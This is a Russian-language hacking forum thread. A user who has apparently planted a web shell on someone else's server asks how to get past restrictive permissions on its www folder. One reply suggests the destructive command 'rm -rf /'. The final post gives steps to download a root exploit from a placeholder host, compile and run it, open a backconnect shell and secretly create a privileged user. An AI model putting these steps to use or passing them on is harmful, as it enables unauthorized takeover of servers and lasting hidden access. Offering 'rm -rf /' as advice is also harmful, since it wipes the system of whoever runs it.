Сменить права на папку www

Discussion in 'Веб-уязвимости' started by Ozone, 9 May 2012.

  1. Ozone

    Ozone New Member

    Joined:
    1 Jul 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Сабж, на папку www стоят права 0111(d--x--x--x), что уже только не пробовал. Предлагайте свои варианты

    Скрин шелла.
    [​IMG]
     
  2. Toxa33rus

    Toxa33rus Member

    Joined:
    31 Mar 2012
    Messages:
    41
    Likes Received:
    6
    Reputations:
    0
    А что уже пробовал?
     
  3. alphacool

    alphacool New Member

    Joined:
    7 Sep 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    chmod -R 755 /dir/
     
  4. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    попробуй rm -rf /
     
  5. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,391
    Likes Received:
    2,794
    Reputations:
    231
    Сервер вас не понимайтунг.
    User () Group () - пустые.
    т.е. вы (пока) никто на этом акке, или его уже зачистили.
     
  6. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    330
    Likes Received:
    129
    Reputations:
    54
    Шелл залил через веб интерфейс? Попробуй в cmd: cd /www/ ; ls -la
     
  7. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,391
    Likes Received:
    2,794
    Reputations:
    231
    cd /www/ - не пустит его на cd /
    прав нет у него рута.
     
  8. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    330
    Likes Received:
    129
    Reputations:
    54
    На cd права рута нужны разве? У меня бывали случаи, что пыху не дает диру смотреть, а через cmd показывало листинг.
     
  9. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,391
    Likes Received:
    2,794
    Reputations:
    231
    php поменяли на сервере, а саму ОСь - ещё не сменили.
     
  10. Ozone

    Ozone New Member

    Joined:
    1 Jul 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Попробовал всё перечисленное, не получается. Наверно, выхода нет.
     
  11. VsemTrololo

    VsemTrololo Banned

    Joined:
    17 May 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    cd /tmp/ && ls -la
    Если пустит то:
    cd /tmp/ && copy('http://rootexploit/exploit.c','exploit.c');
    cd /tmp/ && ls -la && grep 'exploit.c'
    Если найдется то:
    cd /tmp/ && gcc exploit.c -o ./exploit
    cd /tmp/ && ./exploit
    Прокинешь backconnect, создашь юзера втихаря с высшими привелегиями, и всё гуд.
     
Loading...